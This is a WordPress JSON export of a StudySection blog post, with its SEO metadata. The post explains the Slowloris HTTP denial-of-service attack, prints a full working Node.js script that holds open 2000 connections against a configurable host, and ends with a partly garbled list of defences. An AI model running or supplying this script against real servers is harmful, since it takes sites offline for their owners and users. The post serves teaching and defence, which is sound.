{"id":4971,"date":"2021-09-10T04:25:33","date_gmt":"2021-09-10T04:25:33","guid":{"rendered":"https:\/\/studysection.com\/blog\/?p=4971"},"modified":"2021-09-10T06:03:54","modified_gmt":"2021-09-10T06:03:54","slug":"how-slow-loris-attack-using-javascript-on-a-php-server-and-prevent","status":"publish","type":"post","link":"https:\/\/studysection.com\/blog\/how-slow-loris-attack-using-javascript-on-a-php-server-and-prevent\/","title":{"rendered":"How Slow Loris attack using JavaScript on a PHP Server and prevent"},"content":{"rendered":"<p>SlowLoris is actually an HTTP denial of service attack that affects threaded servers. Here&#8217;s how it works:<\/p>\n<ul>\n<li>We start making a lot of HTTP requests.<\/li>\n<li>We send data from time to time (every 15 seconds) to keep connections open.<\/li>\n<li>We never close the connection until the server goes down. If the server closes the connection, we continue to create a new one.<\/li>\n<\/ul>\n<p><strong>Example<\/strong><br \/>\n<img decoding=\"async\" src=\"https:\/\/studysection.com\/blog\/wp-content\/uploads\/2021\/09\/php-code.png\" alt=\"PHP Server\"\/><br \/>\n<\/br><br \/>\n<strong>Code:- <\/strong><br \/>\n<code>const net = require('net')<br \/>\nconst opts = {<br \/>\n\thost: 'localhost',<br \/>\n\tport: 1234,<br \/>\n\tsockets: 2000,<br \/>\n\trespawn: false,<br \/>\n\trate: 600,<br \/>\n\tmethod: 'GET',<br \/>\n\tpath: '\/'<br \/>\n}<br \/>\nlet activeSockets = 0<br \/>\nconsole.log('Starting sockets...')<br \/>\nconst addSocket = () => {<br \/>\n\tlet socket = new net.Socket()<br \/>\n\tsocket.connect(opts.port, opts.host)<br \/>\n\tsocket.on('connect', () => {<br \/>\n\t\tsocket.write(`${opts.method} ${opts.path} HTTP\/1.1\\n`, 'ascii', () => {<br \/>\n\t\tconsole.log('Socket activated. (Total active: ' + activeSockets + ')')<br \/>\n\t\tactiveSockets++<br \/>\n\t\t\tsocket.write(`Host: ${opts.host}\\n`)<br \/>\n\t\t\tlet sentPacketCount = 0<br \/>\n\t\t\tconst intv = setInterval(() => {<br \/>\n\t\t\t\tif(!socket) clearInterval(intv)<br \/>\n\t\t\t\telse {<br \/>\n\t\t\t\t   socket.write(`x-header-${sentPacketCount}: ${sentPacketCount}\\n`)<br \/>\n\t\t\t\t   sentPacketCount++<br \/>\n\t\t\t\t}<br \/>\n\t\t\t}, opts.rate)<br \/>\n\t\t})<br \/>\n\t\tsocket.on('error', err => {<br \/>\n\t\t\tconsole.log('Socket error - ' + err.message)<br \/>\n\t\t\tsocket.destroy()<br \/>\n\t\t})<br \/>\n\t\tsocket.on('data', (data) => {<br \/>\n\t\t\tconsole.log('Socket data - ' + data.toString())<br \/>\n\t\t})<br \/>\n\t\tsocket.on('close', () => {<br \/>\n\t\t\tactiveSockets--<br \/>\n\t\t\tsocket = false<br \/>\n\t\t\tif (opts.respawn) {<br \/>\n\t\t\t\tconsole.log('Respawning dead socket...')<br \/>\n\t\t\t\taddSocket()<br \/>\n\t\t\t}<br \/>\n\t\t})<br \/>\n\t})<br \/>\n\tsocket.on('error', err => {<br \/>\n\t\tconsole.log(`Server down.`)<br \/>\n\t})<br \/>\n}<br \/>\nfor (let i=0;i&lt;opts.sockets; i++) {<br \/>\n\taddSocket()<br \/>\n}<\/code><br \/>\n<img decoding=\"async\" src=\"https:\/\/studysection.com\/blog\/wp-content\/uploads\/2021\/09\/php-code1.png\" alt=\"php-code1\" \/><br \/>\n<\/br><br \/>\nAfter a few minutes, you will see that the PHP server goes down. This is because there are too many connections and the PHP server can\u2019t handle them due to other open connections and memory issues.<br \/>\n<img decoding=\"async\" src=\"https:\/\/studysection.com\/blog\/wp-content\/uploads\/2021\/09\/php-code2.png\" alt=\"php-code2\"\/><br \/>\n<\/br><\/p>\n<h2>Why are Slow Loris Attack Dangerous<\/h2>\n<p>Slow Loris sends incomplete packages, instead of losing them, traditional login search systems do not work well in detecting this type of DDoS attack. Slow Loris DDoS attacks can continue for a long time if they are not detected. Even if the sockets run out, Slow Loris will try to restore the connection until it reaches its goal of shutting down the <a href=\"https:\/\/studysection.com\/blog\/selenium-standalone-server\/\">server<\/a> completely.<\/p>\n<h3>How to Protect Against a Slow Loris attack<\/h3>\n<ol>\n<li>Define minimum incoming data rates, and drop connections that are slower than that rate. At the very least be careful not to set too little, or you risk leaving a legitimate connection.<\/li>\n<li>Reject \/ drop connections with HTTP (actions) are not supported by URLs.<\/li>\n<li>An IP address is allowed to try.<\/li>\n<li>A connection is allowed. Minimum transfer speed and location limit.<\/li>\n<li>Restrict as long as the customer is allowed to stay connected.<\/li>\n<li>Use a service that acts as a reverse proxy, protecting the default server.<\/li>\n<\/ol>\n<p><small><em>StudySection has a long list of certification exams that it offers through its online platform. The <a href=\"https:\/\/www.studysection.com\/php-programming-expert\">PHP Certification Exam<\/a> is one of the programming certifications that it provides. Whether you are new to PHP programming or you have extensive experience in PHP programming, you can get a certification according to your level. Attach a PHP certification with your resume to get the most out of job offers.<\/em><\/small><\/p>\n","protected":false},"excerpt":{"rendered":"<p>SlowLoris is actually an HTTP denial of service attack that affects threaded servers. Here&#8217;s how it works: We start making<\/p>\n","protected":false},"author":1,"featured_media":4972,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[199,200],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v21.7 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>SlowLoris attack using JavaScript on a PHP Server and prevent - SS Blog<\/title>\n<meta name=\"description\" content=\"PHP server goes down because there are too many connections and PHP server can\u2019t handle them due to other open connections and memory issues.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/studysection.com\/blog\/how-slow-loris-attack-using-javascript-on-a-php-server-and-prevent\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"SlowLoris attack using JavaScript on a PHP Server and prevent - SS Blog\" \/>\n<meta property=\"og:description\" content=\"PHP server goes down because there are too many connections and PHP server can\u2019t handle them due to other open connections and memory issues.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/studysection.com\/blog\/how-slow-loris-attack-using-javascript-on-a-php-server-and-prevent\/\" \/>\n<meta property=\"og:site_name\" content=\"Blog Posts on famous people, innovations and educational topics\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/studysection\" \/>\n<meta property=\"article:published_time\" content=\"2021-09-10T04:25:33+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2021-09-10T06:03:54+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/studysection.com\/blog\/wp-content\/uploads\/2021\/09\/JavaScript.png\" \/>\n\t<meta property=\"og:image:width\" content=\"300\" \/>\n\t<meta property=\"og:image:height\" content=\"200\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"admin-studysection-blog\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@studysection\" \/>\n<meta name=\"twitter:site\" content=\"@studysection\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin-studysection-blog\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/studysection.com\/blog\/how-slow-loris-attack-using-javascript-on-a-php-server-and-prevent\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/studysection.com\/blog\/how-slow-loris-attack-using-javascript-on-a-php-server-and-prevent\/\"},\"author\":{\"name\":\"admin-studysection-blog\",\"@id\":\"https:\/\/studysection.com\/blog\/#\/schema\/person\/db367e2c29a12d1808fb1979edb3d402\"},\"headline\":\"How Slow Loris attack using JavaScript on a PHP Server and prevent\",\"datePublished\":\"2021-09-10T04:25:33+00:00\",\"dateModified\":\"2021-09-10T06:03:54+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/studysection.com\/blog\/how-slow-loris-attack-using-javascript-on-a-php-server-and-prevent\/\"},\"wordCount\":342,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\/\/studysection.com\/blog\/#organization\"},\"keywords\":[\"JavaScript\",\"php\"],\"articleSection\":[\"Learn and Grow\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\/\/studysection.com\/blog\/how-slow-loris-attack-using-javascript-on-a-php-server-and-prevent\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/studysection.com\/blog\/how-slow-loris-attack-using-javascript-on-a-php-server-and-prevent\/\",\"url\":\"https:\/\/studysection.com\/blog\/how-slow-loris-attack-using-javascript-on-a-php-server-and-prevent\/\",\"name\":\"SlowLoris attack using JavaScript on a PHP Server and prevent - SS Blog\",\"isPartOf\":{\"@id\":\"https:\/\/studysection.com\/blog\/#website\"},\"datePublished\":\"2021-09-10T04:25:33+00:00\",\"dateModified\":\"2021-09-10T06:03:54+00:00\",\"description\":\"PHP server goes down because there are too many connections and PHP server can\u2019t handle them due to other open connections and memory issues.\",\"breadcrumb\":{\"@id\":\"https:\/\/studysection.com\/blog\/how-slow-loris-attack-using-javascript-on-a-php-server-and-prevent\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/studysection.com\/blog\/how-slow-loris-attack-using-javascript-on-a-php-server-and-prevent\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/studysection.com\/blog\/how-slow-loris-attack-using-javascript-on-a-php-server-and-prevent\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/studysection.com\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"How Slow Loris attack using JavaScript on a PHP Server and prevent\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/studysection.com\/blog\/#website\",\"url\":\"https:\/\/studysection.com\/blog\/\",\"name\":\"Blog Posts on famous people, innovations and educational topics\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\/\/studysection.com\/blog\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/studysection.com\/blog\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/studysection.com\/blog\/#organization\",\"name\":\"StudySection\",\"url\":\"https:\/\/studysection.com\/blog\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/studysection.com\/blog\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/studysection.com\/blog\/wp-content\/uploads\/2021\/10\/studySection-logo.png\",\"contentUrl\":\"https:\/\/studysection.com\/blog\/wp-content\/uploads\/2021\/10\/studySection-logo.png\",\"width\":920,\"height\":440,\"caption\":\"StudySection\"},\"image\":{\"@id\":\"https:\/\/studysection.com\/blog\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/studysection\",\"https:\/\/twitter.com\/studysection\",\"https:\/\/www.instagram.com\/study.section\/\",\"https:\/\/www.linkedin.com\/company\/studysection\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/studysection.com\/blog\/#\/schema\/person\/db367e2c29a12d1808fb1979edb3d402\",\"name\":\"admin-studysection-blog\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/studysection.com\/blog\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/054ac87a6874df1932004239cd8eab36?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/054ac87a6874df1932004239cd8eab36?s=96&d=mm&r=g\",\"caption\":\"admin-studysection-blog\"},\"url\":\"https:\/\/studysection.com\/blog\/author\/admin-studysection-blog\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"SlowLoris attack using JavaScript on a PHP Server and prevent - SS Blog","description":"PHP server goes down because there are too many connections and PHP server can\u2019t handle them due to other open connections and memory issues.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/studysection.com\/blog\/how-slow-loris-attack-using-javascript-on-a-php-server-and-prevent\/","og_locale":"en_US","og_type":"article","og_title":"SlowLoris attack using JavaScript on a PHP Server and prevent - SS Blog","og_description":"PHP server goes down because there are too many connections and PHP server can\u2019t handle them due to other open connections and memory issues.","og_url":"https:\/\/studysection.com\/blog\/how-slow-loris-attack-using-javascript-on-a-php-server-and-prevent\/","og_site_name":"Blog Posts on famous people, innovations and educational topics","article_publisher":"https:\/\/www.facebook.com\/studysection","article_published_time":"2021-09-10T04:25:33+00:00","article_modified_time":"2021-09-10T06:03:54+00:00","og_image":[{"width":300,"height":200,"url":"https:\/\/studysection.com\/blog\/wp-content\/uploads\/2021\/09\/JavaScript.png","type":"image\/png"}],"author":"admin-studysection-blog","twitter_card":"summary_large_image","twitter_creator":"@studysection","twitter_site":"@studysection","twitter_misc":{"Written by":"admin-studysection-blog","Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/studysection.com\/blog\/how-slow-loris-attack-using-javascript-on-a-php-server-and-prevent\/#article","isPartOf":{"@id":"https:\/\/studysection.com\/blog\/how-slow-loris-attack-using-javascript-on-a-php-server-and-prevent\/"},"author":{"name":"admin-studysection-blog","@id":"https:\/\/studysection.com\/blog\/#\/schema\/person\/db367e2c29a12d1808fb1979edb3d402"},"headline":"How Slow Loris attack using JavaScript on a PHP Server and prevent","datePublished":"2021-09-10T04:25:33+00:00","dateModified":"2021-09-10T06:03:54+00:00","mainEntityOfPage":{"@id":"https:\/\/studysection.com\/blog\/how-slow-loris-attack-using-javascript-on-a-php-server-and-prevent\/"},"wordCount":342,"commentCount":0,"publisher":{"@id":"https:\/\/studysection.com\/blog\/#organization"},"keywords":["JavaScript","php"],"articleSection":["Learn and Grow"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/studysection.com\/blog\/how-slow-loris-attack-using-javascript-on-a-php-server-and-prevent\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/studysection.com\/blog\/how-slow-loris-attack-using-javascript-on-a-php-server-and-prevent\/","url":"https:\/\/studysection.com\/blog\/how-slow-loris-attack-using-javascript-on-a-php-server-and-prevent\/","name":"SlowLoris attack using JavaScript on a PHP Server and prevent - SS Blog","isPartOf":{"@id":"https:\/\/studysection.com\/blog\/#website"},"datePublished":"2021-09-10T04:25:33+00:00","dateModified":"2021-09-10T06:03:54+00:00","description":"PHP server goes down because there are too many connections and PHP server can\u2019t handle them due to other open connections and memory issues.","breadcrumb":{"@id":"https:\/\/studysection.com\/blog\/how-slow-loris-attack-using-javascript-on-a-php-server-and-prevent\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/studysection.com\/blog\/how-slow-loris-attack-using-javascript-on-a-php-server-and-prevent\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/studysection.com\/blog\/how-slow-loris-attack-using-javascript-on-a-php-server-and-prevent\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/studysection.com\/blog\/"},{"@type":"ListItem","position":2,"name":"How Slow Loris attack using JavaScript on a PHP Server and prevent"}]},{"@type":"WebSite","@id":"https:\/\/studysection.com\/blog\/#website","url":"https:\/\/studysection.com\/blog\/","name":"Blog Posts on famous people, innovations and educational topics","description":"","publisher":{"@id":"https:\/\/studysection.com\/blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/studysection.com\/blog\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/studysection.com\/blog\/#organization","name":"StudySection","url":"https:\/\/studysection.com\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/studysection.com\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/studysection.com\/blog\/wp-content\/uploads\/2021\/10\/studySection-logo.png","contentUrl":"https:\/\/studysection.com\/blog\/wp-content\/uploads\/2021\/10\/studySection-logo.png","width":920,"height":440,"caption":"StudySection"},"image":{"@id":"https:\/\/studysection.com\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/studysection","https:\/\/twitter.com\/studysection","https:\/\/www.instagram.com\/study.section\/","https:\/\/www.linkedin.com\/company\/studysection"]},{"@type":"Person","@id":"https:\/\/studysection.com\/blog\/#\/schema\/person\/db367e2c29a12d1808fb1979edb3d402","name":"admin-studysection-blog","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/studysection.com\/blog\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/054ac87a6874df1932004239cd8eab36?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/054ac87a6874df1932004239cd8eab36?s=96&d=mm&r=g","caption":"admin-studysection-blog"},"url":"https:\/\/studysection.com\/blog\/author\/admin-studysection-blog\/"}]}},"views":465,"_links":{"self":[{"href":"https:\/\/studysection.com\/blog\/wp-json\/wp\/v2\/posts\/4971"}],"collection":[{"href":"https:\/\/studysection.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/studysection.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/studysection.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/studysection.com\/blog\/wp-json\/wp\/v2\/comments?post=4971"}],"version-history":[{"count":5,"href":"https:\/\/studysection.com\/blog\/wp-json\/wp\/v2\/posts\/4971\/revisions"}],"predecessor-version":[{"id":4980,"href":"https:\/\/studysection.com\/blog\/wp-json\/wp\/v2\/posts\/4971\/revisions\/4980"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/studysection.com\/blog\/wp-json\/wp\/v2\/media\/4972"}],"wp:attachment":[{"href":"https:\/\/studysection.com\/blog\/wp-json\/wp\/v2\/media?parent=4971"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/studysection.com\/blog\/wp-json\/wp\/v2\/categories?post=4971"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/studysection.com\/blog\/wp-json\/wp\/v2\/tags?post=4971"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}